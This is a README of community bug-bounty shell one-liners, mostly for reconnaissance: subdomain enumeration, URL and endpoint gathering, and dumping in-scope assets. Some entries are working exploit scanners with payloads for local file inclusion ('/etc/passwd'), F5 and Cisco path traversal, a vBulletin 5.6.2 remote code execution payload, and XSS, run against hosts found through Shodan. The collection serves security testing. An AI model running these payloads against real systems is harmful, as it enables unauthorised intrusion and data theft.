Awesome One-liner Bug Bounty


Bug Bounty

A collection of awesome one-liner scripts especially for bug bounty tips.

This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily welcome.

Local File Inclusion


gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'



export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'


cat waybackurl.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy -sk > /dev/null



gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt


 waybackurls | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b pipe > output.txt

Prototype Pollution


subfinder -d -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"



shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done



while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt

vBulletin 5.6.2 – ‘widget_tabbedContainer_tab_panel’ Remote Code Execution


shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

Find JS Files


assetfinder | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

Extract Endpoints from JS File


cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Orgz from Target Lists


for DOMAIN in $(cat domains.txt);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

Get Subdomains from


curl -s "$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from


curl -s |jq -r .FDNS_A[]|cut -d',' -f2|sort -u


curl "$DOMAIN" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$DOMAIN"

Get Subdomains from


curl -s "" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal


curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore


curl -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"

Get Subdomains from CertSpotter


curl -s "" | jq .[].dns_names | tr -d '[]"\n ' | tr ',' '\n'

Get Subdomains from Archive


curl -s "**&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC


curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails


curl -s "" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep "" | sort -u

Bruteforcing subdomain using DNS Over


while read sub;do echo "$" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep "" | sort -u ; done < wordlists.txt

Get Subdomains With


curl --silent | grep -oE "[a-zA-Z0-9._-]+\" | sort -u 

Get Subdomains With


curl --silent -X POST -d "" | grep -oE "[a-zA-Z0-9._-]+\" | sort -u 

Get Subdomains from


curl -s "$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from


curl "" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent

Subdomain Bruteforcer with FFUF


ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | grep "| URL |" | awk '{print $4}'

Find All Allocated IP ranges for ASN given an IP address

whois -h -i origin -T route $(whois -h $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File


grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

Ports Scan without CloudFlare


subfinder -silent -d | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists


gau| unfurl -u keys | tee -a wordlist.txt ; gau | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt  | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt  

Extracts Juicy Informations

@Prial Islam Khan

for sub in $(cat domains.txt);do /usr/bin/gron "$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt  ;done

Find Subdomains TakeOver


subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/ -v 3 >> takeover ; 

Get multiple target’s Custom URLs from ParamSpider


cat domains | xargs -I % python3 ~/tool/ParamSpider/ -l high -o ./spidering/paramspider/% -d % ;

URLs Probing with cURL + Parallel


cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Dump In-scope Assets from chaos-bugbounty-list


curl -sL | jq -r '.programs[].domains | to_entries | .[].value'

Dump In-scope Assets from bounty-targets-data


HackerOne Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Get all the urls out of a sitemap.xml


curl -s | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure bash Linkfinder


curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt

Extract Endpoints from swagger.json


curl -s https://domain.tld/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration


site=""; gau "$site" | while read url;do target=$(curl -s -I -H "Origin:" -X GET $url) | if grep ''; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

Find Hidden Servers and/or Admin Panels


ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt 

Recon using


curl -s -w "\n%{http_code}" | jg .[].domain

Find live host/domain/assets


subfinder -d -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf


waybackurls| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Extract endpoints from APK files


apkurlgrep -a path/to/file.apk

Get Subdomains from IPs


python3 <target-ips.txt> > vhosts.txt



python -i list.txt -w 40

Removes duplicate URLs and parameter combinations


cat urls.txt |qsreplace -a

Gather domains from content-security-policy:


curl -v -silent https://$domain --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u